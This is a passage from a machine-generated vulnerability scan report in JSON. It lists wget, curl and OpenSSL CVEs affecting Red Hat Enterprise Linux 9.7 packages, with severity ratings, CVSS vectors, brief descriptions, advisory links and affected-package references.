vulnerable. In these cases attackers can enter crafted credentials which will cause Wget to access an arbitrary host.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-10524" }, { "url": "http://www.openwall.com/lists/oss-security/2024/11/18/6" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-10524" }, { "url": "https://git.savannah.gnu.org/cgit/wget.git/commit/?id=c419542d956a2607bbce5df64b9d378a8588d778" }, { "url": "https://github.com/advisories/GHSA-mqrm-h2pw-9j9r" }, { "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability" }, { "url": "https://jfrog.com/blog/cve-2024-10524-wget-zero-day-vulnerability/" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10524" }, { "url": "https://seclists.org/oss-sec/2024/q4/107" }, { "url": "https://security.netapp.com/advisory/ntap-20250321-0007" }, { "url": "https://security.netapp.com/advisory/ntap-20250321-0007/" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-10524" } ], "published": "2024-11-19T15:15:06+00:00", "updated": "2026-04-15T00:35:42+00:00", "affects": [ { "ref": "pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "1.21.1-8.el9_4", "status": "affected" } ] }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/wget@1.21.1-8.el9_4?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "code_not_reachable", "response": [ "update" ], "detail": null } }, { "id": "CVE-2024-11053", "ratings": [ { "source": { "name": "alma" }, "severity": "high" }, { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "high" }, { "source": { "name": "cbl-mariner" }, "severity": "high" }, { "source": { "name": "julia" }, "score": 3.4, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N" }, { "source": { "name": "oracle-oval" }, "severity": "high" }, { "source": { "name": "photon" }, "severity": "low" }, { "source": { "name": "redhat" }, "score": 5.9, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "rocky" }, "severity": "high" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "description": "When asked to both use a `.netrc` file for credentials and to follow HTTP\nredirects, curl could leak the password used for the first host to the\nfollowed-to host under certain circumstances.\n\nThis flaw only manifests itself if the netrc file has an entry that matches\nthe redirect target hostname but the entry either omits just the password or\nomits both login and password.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-11053" }, { "url": "http://www.openwall.com/lists/oss-security/2024/12/11/1" }, { "url": "https://access.redhat.com/errata/RHSA-2025:1671" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-11053" }, { "url": "https://bugzilla.redhat.com/2294581" }, { "url": "https://bugzilla.redhat.com/2294676" }, { "url": "https://bugzilla.redhat.com/2301888" }, { "url": "https://bugzilla.redhat.com/2318857" }, { "url": "https://bugzilla.redhat.com/2318858" }, { "url": "https://bugzilla.redhat.com/2318870" }, { "url": "https://bugzilla.redhat.com/2318873" }, { "url": "https://bugzilla.redhat.com/2318874" }, { "url": "https://bugzilla.redhat.com/2318876" }, { "url": "https://bugzilla.redhat.com/2318882" }, { "url": "https://bugzilla.redhat.com/2318883" }, { "url": "https://bugzilla.redhat.com/2318884" }, { "url": "https://bugzilla.redhat.com/2318885" }, { "url": "https://bugzilla.redhat.com/2318886" }, { "url": "https://bugzilla.redhat.com/2318897" }, { "url": "https://bugzilla.redhat.com/2318900" }, { "url": "https://bugzilla.redhat.com/2318905" }, { "url": "https://bugzilla.redhat.com/2318914" }, { "url": "https://bugzilla.redhat.com/2318922" }, { "url": "https://bugzilla.redhat.com/2318923" }, { "url": "https://bugzilla.redhat.com/2318925" }, { "url": "https://bugzilla.redhat.com/2318926" }, { "url": "https://bugzilla.redhat.com/2318927" }, { "url": "https://bugzilla.redhat.com/2331191" }, { "url": "https://bugzilla.redhat.com/2339218" }, { "url": "https://bugzilla.redhat.com/2339220" }, { "url": "https://bugzilla.redhat.com/2339221" }, { "url": "https://bugzilla.redhat.com/2339226" }, { "url": "https://bugzilla.redhat.com/2339231" }, { "url": "https://bugzilla.redhat.com/2339236" }, { "url": "https://bugzilla.redhat.com/2339238" }, { "url": "https://bugzilla.redhat.com/2339243" }, { "url": "https://bugzilla.redhat.com/2339247" }, { "url": "https://bugzilla.redhat.com/2339252" }, { "url": "https://bugzilla.redhat.com/2339259" }, { "url": "https://bugzilla.redhat.com/2339266" }, { "url": "https://bugzilla.redhat.com/2339270" }, { "url": "https://bugzilla.redhat.com/2339271" }, { "url": "https://bugzilla.redhat.com/2339275" }, { "url": "https://bugzilla.redhat.com/2339277" }, { "url": "https://bugzilla.redhat.com/2339281" }, { "url": "https://bugzilla.redhat.com/2339284" }, { "url": "https://bugzilla.redhat.com/2339291" }, { "url": "https://bugzilla.redhat.com/2339293" }, { "url": "https://bugzilla.redhat.com/2339295" }, { "url": "https://bugzilla.redhat.com/2339299" }, { "url": "https://bugzilla.redhat.com/2339300" }, { "url": "https://bugzilla.redhat.com/2339304" }, { "url": "https://bugzilla.redhat.com/2339305" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305" }, { "url": "https://curl.se/docs/CVE-2024-11053.html" }, { "url": "https://curl.se/docs/CVE-2024-11053.json" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559" }, { "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html" }, { "url": "https://errata.rockylinux.org/RLSA-2025:1671" }, { "url": "https://github.com/advisories/GHSA-h288-5fq8-5pfw" }, { "url": "https://hackerone.com/reports/2829063" }, { "url": "https://linux.oracle.com/cve/CVE-2024-11053.html" }, { "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-11053" }, { "url": "https://security.netapp.com/advisory/ntap-20250124-0012" }, { "url": "https://security.netapp.com/advisory/ntap-20250124-0012/" }, { "url": "https://security.netapp.com/advisory/ntap-20250131-0003" }, { "url": "https://security.netapp.com/advisory/ntap-20250131-0003/" }, { "url": "https://security.netapp.com/advisory/ntap-20250131-0004" }, { "url": "https://security.netapp.com/advisory/ntap-20250131-0004/" }, { "url": "https://ubuntu.com/security/notices/USN-7162-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2024-11053" }, { "url": "https://www.oracle.com/security-alerts/cpujan2025.html#AppendixMSQL" } ], "published": "2024-12-11T08:15:05+00:00", "updated": "2025-11-03T21:16:04+00:00", "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ] }, { "id": "CVE-2024-13176", "ratings": [ { "source": { "name": "alma" }, "severity": "medium" }, { "source": { "name": "amazon" }, "severity": "medium" }, { "source": { "name": "azure" }, "severity": "medium" }, { "source": { "name": "cbl-mariner" }, "severity": "medium" }, { "source": { "name": "julia" }, "score": 4.1, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:P/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" }, { "source": { "name": "oracle-oval" }, "severity": "medium" }, { "source": { "name": "redhat" }, "score": 4.7, "severity": "low", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "source": { "name": "rocky" }, "severity": "medium" }, { "source": { "name": "ubuntu" }, "severity": "low" } ], "cwes": [ 385 ], "description": "Issue summary: A timing side-channel which could potentially allow recovering\nthe private key exists in the ECDSA signature computation.\n\nImpact summary: A timing side-channel in ECDSA signature computations\ncould allow recovering the private key by an attacker. However, measuring\nthe timing would require either local access to the signing application or\na very fast network connection with low latency.\n\nThere is a timing signal of around 300 nanoseconds when the top word of\nthe inverted ECDSA nonce value is zero. This can happen with significant\nprobability only for some of the supported elliptic curves. In particular\nthe NIST P-521 curve is affected. To be able to measure this leak, the attacker\nprocess must either be located in the same physical computer or must\nhave a very fast network connection with low latency. For that reason\nthe severity of this vulnerability is Low.\n\nThe FIPS modules in 3.4, 3.3, 3.2, 3.1 and 3.0 are affected by this issue.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2024-13176" }, { "url": "http://www.openwall.com/lists/oss-security/2025/01/20/2" }, { "url": "https://access.redhat.com/errata/RHSA-2025:16046" }, { "url": "https://access.redhat.com/security/cve/CVE-2024-13176" }, { "url": "https://bugzilla.redhat.com/2359885" }, { "url": "https://bugzilla.redhat.com/2359888" }, { "url": "https://bugzilla.redhat.com/2359892" }, { "url": "https://bugzilla.redhat.com/2359894" }, { "url": "https://bugzilla.redhat.com/2359895" }, { "url": "https://bugzilla.redhat.com/2359899" }, { "url": "https://bugzilla.redhat.com/2359900" }, { "url": "https://bugzilla.redhat.com/2359902" }, { "url": "https://bugzilla.redhat.com/2359903" }, { "url": "https://bugzilla.redhat.com/2359911" }, { "url": "https://bugzilla.redhat.com/2359918" }, { "url": "https://bugzilla.redhat.com/2359920" }, { "url": "https://bugzilla.redhat.com/2359924" }, { "url": "https://bugzilla.redhat.com/2359928" }, { "url": "https://bugzilla.redhat.com/2359930" }, { "url": "https://bugzilla.redhat.com/2359932" }, { "url": "https://bugzilla.redhat.com/2359934" }, { "url": "https://bugzilla.redhat.com/2359938" }, { "url": "https://bugzilla.redhat.com/2359940" }, { "url": "https://bugzilla.redhat.com/2359943" }, { "url": "https://bugzilla.redhat.com/2359944" }, { "url": "https://bugzilla.redhat.com/2359945" }, { "url": "https://bugzilla.redhat.com/2359947" }, { "url": "https://bugzilla.redhat.com/2359950" }, { "url": "https://bugzilla.redhat.com/2359963" }, { "url": "https://bugzilla.redhat.com/2359964" }, { "url": "https://bugzilla.redhat.com/2359972" }, { "url": "https://bugzilla.redhat.com/2370920" }, { "url": "https://bugzilla.redhat.com/2380264" }, { "url": "https://bugzilla.redhat.com/2380273" }, { "url": "https://bugzilla.redhat.com/2380274" }, { "url": "https://bugzilla.redhat.com/2380278" }, { "url": "https://bugzilla.redhat.com/2380280" }, { "url": "https://bugzilla.redhat.com/2380283" }, { "url": "https://bugzilla.redhat.com/2380284" }, { "url": "https://bugzilla.redhat.com/2380290" }, { "url": "https://bugzilla.redhat.com/2380291" }, { "url": "https://bugzilla.redhat.com/2380295" }, { "url": "https://bugzilla.redhat.com/2380298" }, { "url": "https://bugzilla.redhat.com/2380306" }, { "url": "https://bugzilla.redhat.com/2380308" }, { "url": "https://bugzilla.redhat.com/2380309" }, { "url": "https://bugzilla.redhat.com/2380310" }, { "url": "https://bugzilla.redhat.com/2380312" }, { "url": "https://bugzilla.redhat.com/2380313" }, { "url": "https://bugzilla.redhat.com/2380320" }, { "url": "https://bugzilla.redhat.com/2380321" }, { "url": "https://bugzilla.redhat.com/2380322" }, { "url": "https://bugzilla.redhat.com/2380326" }, { "url": "https://bugzilla.redhat.com/2380327" }, { "url": "https://bugzilla.redhat.com/2380334" }, { "url": "https://bugzilla.redhat.com/2380335" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2338999" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359885" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359888" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359892" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359894" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359895" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359899" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359900" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359902" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359903" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359911" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359918" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359920" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359924" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359928" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359930" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359932" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359934" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359938" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359940" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359943" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359944" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359945" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359947" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359950" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359963" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359964" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2359972" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2370920" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380264" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380273" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380274" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380278" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380280" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380283" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380284" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380290" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380291" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380295" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380298" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380306" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380308" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380309" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380310" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380312" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380313" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380320" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380321" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380322" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380326" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380327" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380334" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2380335" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13176" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21574" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21575" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21577" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21579" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21580" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21581" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21584" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21585" }, { "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21588" }, { "url": 